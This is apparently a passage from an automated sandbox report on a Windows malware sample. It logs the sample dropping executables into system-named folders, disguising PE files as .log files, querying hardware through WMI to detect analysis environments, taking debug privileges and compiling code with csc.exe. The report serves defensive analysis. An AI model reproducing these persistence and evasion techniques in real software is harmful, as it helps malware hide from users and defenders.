                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\upfc.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeMemory allocated: E40000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeMemory allocated: 1AC20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeMemory allocated: 1B310000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeMemory allocated: 1AF20000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeMemory allocated: 770000 memory reserve | memory write watch
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeMemory allocated: 1A4F0000 memory reserve | memory write watch
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeMemory allocated: B90000 memory reserve | memory write watch
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeMemory allocated: 1A820000 memory reserve | memory write watch
                            Source: C:\Recovery\upfc.exeMemory allocated: FF0000 memory reserve | memory write watch
                            Source: C:\Recovery\upfc.exeMemory allocated: 1AD50000 memory reserve | memory write watch
                            Source: C:\Recovery\upfc.exeMemory allocated: D60000 memory reserve | memory write watch
                            Source: C:\Recovery\upfc.exeMemory allocated: 1A700000 memory reserve | memory write watch
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeMemory allocated: 650000 memory reserve | memory write watch
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeMemory allocated: 1A3B0000 memory reserve | memory write watch
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeMemory allocated: FA0000 memory reserve | memory write watch
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeMemory allocated: 1AA70000 memory reserve | memory write watch
                            Source: C:\Windows\IME\en-GB\Registry.exeMemory allocated: 11B0000 memory reserve | memory write watch
                            Source: C:\Windows\IME\en-GB\Registry.exeMemory allocated: 1AE90000 memory reserve | memory write watch
                            Source: C:\Windows\IME\en-GB\Registry.exeMemory allocated: F70000 memory reserve | memory write watch
                            Source: C:\Windows\IME\en-GB\Registry.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeMemory allocated: EB0000 memory reserve | memory write watch
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeMemory allocated: 1A9A0000 memory reserve | memory write watch
                            Source: C:\Recovery\upfc.exeMemory allocated: 940000 memory reserve | memory write watch
                            Source: C:\Recovery\upfc.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\IME\en-GB\Registry.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\IME\en-GB\Registry.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeDropped PE file which has not been started: C:\Users\user\Desktop\rCwnUSpv.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeDropped PE file which has not been started: C:\Users\user\Desktop\ISkSYroH.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeDropped PE file which has not been started: C:\Users\user\Desktop\qLTnEFIs.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeDropped PE file which has not been started: C:\Users\user\Desktop\MilkDJCZ.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeDropped PE file which has not been started: C:\Users\user\Desktop\kSqObZEE.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeDropped PE file which has not been started: C:\Users\user\Desktop\mgFxlINb.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeDropped PE file which has not been started: C:\Users\user\Desktop\bJiZPSMv.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeDropped PE file which has not been started: C:\Users\user\Desktop\paINcIrQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZzLYPzhu.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeDropped PE file which has not been started: C:\Users\user\Desktop\RBEiIUto.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeDropped PE file which has not been started: C:\Users\user\Desktop\kmqOzLcc.logJump to dropped file
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeDropped PE file which has not been started: C:\Users\user\Desktop\gXpxUtOK.logJump to dropped file
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exe TID: 6812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe TID: 6472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe TID: 5760Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe TID: 344Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe TID: 3340Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe TID: 6480Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\upfc.exe TID: 6764Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\upfc.exe TID: 6796Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exe TID: 3996Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exe TID: 6104Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\IME\en-GB\Registry.exe TID: 3056Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\IME\en-GB\Registry.exe TID: 3480Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe TID: 5780Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\upfc.exe TID: 6804Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\IME\en-GB\Registry.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\IME\en-GB\Registry.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\upfc.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\IME\en-GB\Registry.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\IME\en-GB\Registry.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\upfc.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1661809574.000000001B847000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrorC%SystemRoot%\system32\mswsock.dll"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess token adjusted: Debug
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess token adjusted: Debug
                            Source: C:\Recovery\upfc.exeProcess token adjusted: Debug
                            Source: C:\Recovery\upfc.exeProcess token adjusted: Debug
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess token adjusted: Debug
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeProcess token adjusted: Debug
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess token adjusted: Debug
                            Source: C:\Windows\IME\en-GB\Registry.exeProcess token adjusted: Debug
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP"Jump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
